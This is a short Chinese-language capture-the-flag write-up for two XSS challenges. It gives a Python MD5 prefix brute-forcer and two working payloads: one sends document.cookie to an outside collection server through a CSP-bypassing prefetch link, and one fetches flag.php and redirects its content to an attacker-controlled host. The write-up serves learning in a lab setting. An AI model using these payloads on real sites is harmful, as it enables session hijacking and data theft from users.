1.http://202.112.51.217:33323/
# 这个题目要先写一个脚本爆破随机码
#!/usr/bin/env python
# encoding: utf-8
import hashlib
import random
import sys
import string
def m(content):
return hashlib.md5(content).hexdigest()
def main():
start = sys.argv[1]
while True:
content = ""
for i in range(0x04):
content += random.choice(string.letters)
print "[-] [%s]" % (content)
if m(content).startswith(start):
print "[+] Found : [%s]" % (content)
break
if __name__ == "__main__":
main()
#接着向输入框里面输入payload
<script>
//创造一个link标签,<link>标签的作用是请求一个资源,它会向所给的网址发送一个请求,因此我门可以在请求里发送cookie
var n0t = document.createElement("link");
//'rel':prefetch,会执行预加载,这里用绕过CSP
n0t.setAttribute("rel", "prefetch");
//'href'是链接属性,前面的应该是XSS平台的地址,后面加上受害者的cookie,这个请求会在XSS平台上看到
n0t.setAttribute("href", "//123.207.40.26:65534/?c=" + document.cookie);
//把你创建的对象加入到受害者浏览器的文档里
document.head.appendChild(n0t);
</script>
2.http://202.112.51.217:43424/
#这个题先尝试直接打cookie,但是发现不行。
#但看到题目说flag在flag.php里面,因此换种方式,让管理员向flag.php发送请求,再把里面的内容发送到XSS平台
//这里需要调用jQuery来实现,因此先引入jquery的库
<script src="./js/jquery.min.js"></script>
<script>
//这里调用jquery的get方法,具体解释看图
//data是flag.php的内容,回调函数function()自己定义
$.get("http://202.112.51.217:43426/flag.php", function(data){
//location函数是跳转到href,xxx应该是XSS平台的地址,这样就会给我们的XSS平台发送请求
window.location.href="http://xxx/?="+data;
})
</script>